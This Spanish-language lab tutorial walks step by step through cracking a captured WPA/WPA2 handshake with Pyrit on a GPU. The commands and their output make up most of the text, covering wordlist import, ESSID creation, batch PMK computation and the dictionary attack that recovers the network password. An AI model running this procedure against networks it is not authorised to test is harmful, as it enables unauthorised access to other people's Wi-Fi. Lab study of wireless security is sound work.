##Este laboratorio fue hecho con 2 ordenadores en un entorno privado y con fines educativos, cualquier uso indebido del mismo es bajo tu Responsabilidad.........##

usando pyrit para el precalculo del diccionario con una tarjeta grafica ati o nvidia que usaremos para procesar 4 veces mas rapido que el la cpu y acortar el tiempo para encontrar la key del handshake wpa/wpa2

hacemos el test para saber si nuestra tarjeta grafica soporta pyrit

Code:
root@bt:~# pyrit list_cores
  
The following cores seem available...
#1:  'OpenCL-Device 'Redwood''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'
ahora hacemos un benchmark para mostrar el rendimiento de calculo tanto de las cpu como de la gpu de la tarjeta

Code:
root@bt:~# pyrit benchmark
  
Running benchmark (6413.8 PMKs/s)... /

Computed 6413.77 PMKs/s total.
#1: 'OpenCL-Device 'Redwood'': 5979.6 PMKs/s (RTT 2.8)
#2: 'CPU-Core (SSE2)': 442.4 PMKs/s (RTT 2.5)
#3: 'CPU-Core (SSE2)': 363.3 PMKs/s (RTT 3.4)
#4: 'CPU-Core (SSE2)': 319.3 PMKs/s (RTT 3.2)
Como vemos la GPU de la tarjeta grafica tiene un nivel de procesamiento superior que los 3 cpu juntos registrando hasta 5979.6 PMKs/s



sabiendo que nuestra tarjeta ati tiene un alto nivel de pre-procesado importamos el diccionario a la base de datos...

Code:
root@bt:~# pyrit -i /pentest/passwords/wordlists/darkc0de.lst import_passwords

Pyrit 0.3.1-dev (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
1707658 lines read. Flushing buffers....
All done.
ahora creamos el essid real de donde hemos obtenido el handshake

Code:
root@bt:~# pyrit -e HackersAtHome create_essid
 
Connecting to storage at 'file://'...  connected.
Created ESSID 'HackersAtHome'
asociando la base de datos que importamos en el paso 1 con el essid que hemos creado despues
Code:
oot@bt:~#pyrit batch

Connecting to storage at 'file://'...  connected.
Working on ESSID 'HackersAtHome'

Processed 164/256 workunits so far (64.1%); 7135 PMKs per second.
Connecting to storage at 'file://'...  connected.
Working on ESSID 'HackersAtHome'
Processed all workunits for ESSID 'HackersAtHome'; 7958 PMKs per second
como vemos ya ha asociado la base de datos al essid y con el siguiente comando lo verificamos

Code:
root@bt:~# pyrit eval

Connecting to storage at 'file://'...  connected.
Passwords available: 994614

ESSID 'HackersAtHome' : 994614 (100.00%)
todo listo ahora nos dirigimos a la carpeta donde tenemos el Handshake y ejecutamos lo siguiente..>>recordar que "wpa-10.cap" es el nombre de mi handshake puede que cambie en el vuestro

Code:
root@bt:~# pyrit -r wpa-01.cap attack_db

 Connecting to storage at 'file://'...  connected.
Parsing file 'wpa-01.cap' (1/1)...
Parsed 4 packets (4 802.11-packets), got 1 AP(s)

Picked AccessPoint xx:1x:f7:8f:xx:xx ('HackersAtHome') automatically.
Attacking handshake with Station xx:xx:xx:xc:f4:xx...
Tried 415460 PMKs so far (41.8%); 122586390 PMKs per second.

The password is 'GOOGLEESTUAMIGO12345678'
root@bt:~#
nota: el proceso no tardo mas de 3 minutos en procesar el diccionario y encontrar la clave menos de 10 segundos..
cabe aclarar que para que tengas exito en encontrar la clave, esta misma ya tiene que venir en el diccionario y esta es la parte mas complicada ya que los diccionarios que hay suelen estar en ingles o no tienen la longitud de la clave.
Ta luego.